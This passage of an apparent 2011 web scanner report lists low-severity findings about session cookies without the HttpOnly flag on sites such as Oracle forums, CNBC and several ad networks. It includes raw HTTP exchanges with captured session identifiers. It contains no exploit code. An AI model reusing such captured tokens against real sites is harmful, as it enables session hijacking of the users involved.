The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906110541 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f22ce332bb32f495908027d55

Response

13.3. http://blog.harbottle.com/dm/xmlrpc.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://blog.harbottle.com
Path:	/dm/xmlrpc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e97d8a82d9152534016674330abb1139; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dm/xmlrpc.php HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: PHPSESSID=e97d8a82d9152534016674330abb1139; path=/
Content-Length: 42
Connection: close
Content-Type: text/html

XML-RPC server accepts POST requests only.

13.4. http://convctr.overture.com/images/cc/cc.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://convctr.overture.com
Path:	/images/cc/cc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.5. http://data.cnbc.com/quotes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://data.cnbc.com
Path:	/quotes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=1D2F47641A6DD26BE61912AD60DD5D15; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.6. https://forums.oracle.com/forums/adfAuthentication previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/adfAuthentication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.7. https://forums.oracle.com/forums/category.jspa previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/category.jspa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
BIGipServerforums_prod_pool=202412685.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.8. https://forums.oracle.com/forums/guestsettings!default.jspa previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/guestsettings!default.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/guestsettings!default.jspa HTTP/1.1
Host: forums.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.9. https://forums.oracle.com/forums/index.jspa previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/index.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.10. https://forums.oracle.com/forums/login!withRedirect.jspa previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/login!withRedirect.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.11. https://forums.oracle.com/forums/main.jspa previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/main.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.12. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://netsuite.tt.omtrdc.net
Path:	/m2/netsuite/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxSession=1315341135013-154927; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 06-Sep-2011 16:08:46 GMT; Path=/m2/netsuite

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPC=1315341135013-154927.19&mboxPage=1315341466598-609944&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=HP_Trial_111510&mboxId=0&mboxTime=1315323466980&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315341135013-154927.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Tue, 06 Sep 2011 15:37:46 GMT
Location: http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPC=1315341135013-154927.19&mboxPage=1315341466598-609944&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=HP_Trial_111510&mboxId=0&mboxTime=1315323466980&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&mboxReferrer=&mboxVersion=40&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315341135013-154927; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 06-Sep-2011 16:08:46 GMT; Path=/m2/netsuite
Content-Length: 0

13.13. http://pg.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pg.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sessionstamp=27545040; expires=Tue, 06-Sep-2011 17:46:40 GMT; domain=.channelintelligence.com; path=/
ASPSESSIONIDQQBBATAR=PLAFJPGCOAIHIKCFGNLLPKIC; path=/
serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=163810295&nICnt=1&nDCnt=8&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098978&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=13017277_841291_8679155_13016956_48968727_11302_86109971_26080384&nRID=0&sRnd=B96Gkfc1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSTCSACR=OMFNJPGCMPJDECJINBCLIADH; serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:46:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96Gkfc1
Content-Length: 685
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:45:41 GMT
Set-Cookie: sessionstamp=27545040; expires=Tue, 06-Sep-2011 17:46:40 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDQQBBATAR=PLAFJPGCOAIHIKCFGNLLPKIC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=163810295&r
...[SNIP]...

13.14. http://pg.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pg.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sessionstamp=27545045; expires=Tue, 06-Sep-2011 17:46:42 GMT; domain=.channelintelligence.com; path=/
ASPSESSIONIDSSAACRAR=JFOLFFNCAOIGHHNCKCKCPJKC; path=/
serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=48968727_26080384_8679155_11302_2271669_13016956_841291_64856419_24552604_13017277_48968727&nRID=0&sRnd=B96Gkgc1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098961
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSTCSACR=OMFNJPGCMPJDECJINBCLIADH; serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:46:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D48968727%5F26080384%5F8679155%5F11302%5F2271669%5F13016956%5F841291%5F64856419%5F24552604%5F13017277%5F48968727%26nRID%3D0%26sRnd%3DB96Gkgc1
Content-Length: 716
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:45:42 GMT
Set-Cookie: sessionstamp=27545045; expires=Tue, 06-Sep-2011 17:46:42 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDSSAACRAR=JFOLFFNCAOIGHHNCKCKCPJKC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rg
...[SNIP]...

13.15. http://pg.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pg.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/
ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/
serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.16. http://pixel.adsafeprotected.com/jspix previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7C0A9FBD613B362C337EB77B71CF9834; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7C0A9FBD613B362C337EB77B71CF9834; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",

...[SNIP]...

13.17. http://pixel.everesttech.net/1688/i previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.everesttech.net
Path:	/1688/i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.18. https://register.cnbc.com/forgotPassword.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/
pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.19. https://register.cnbc.com/memberCenter.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/memberCenter.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/
pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.20. https://register.cnbc.com/registerUser.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/registerUser.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/
pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.21. http://search.oracle.com/search/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://search.oracle.com
Path:	/search/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=8d920c7f1e6c29f780b369434c7e86c0802cf02ce47e; path=/search
BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TN;ecid=118531604039,0)
Content-Length: 38704
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:24 GMT
Connection: close
Set-Cookie: JSESSIONID=8d920c7f1e6c29f780b369434c7e86c0802cf02ce47e; path=/search
Set-Cookie: ses.qapp.sg_tab_name=Oracle+OpenWorld; HttpOnly
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

...[SNIP]...

13.22. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:38 GMT
Content-Length: 167
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

13.23. http://ttwbs.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ttwbs.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.24. http://www.atg.com/svc-common/script/propertyFunc.js.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.atg.com
Path:	/svc-common/script/propertyFunc.js.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /svc-common/script/propertyFunc.js.jsp HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

13.25. http://a.tribalfusion.com/displayAd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.26. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.27. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.29. http://a.tribalfusion.com/z/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/z/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.30. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
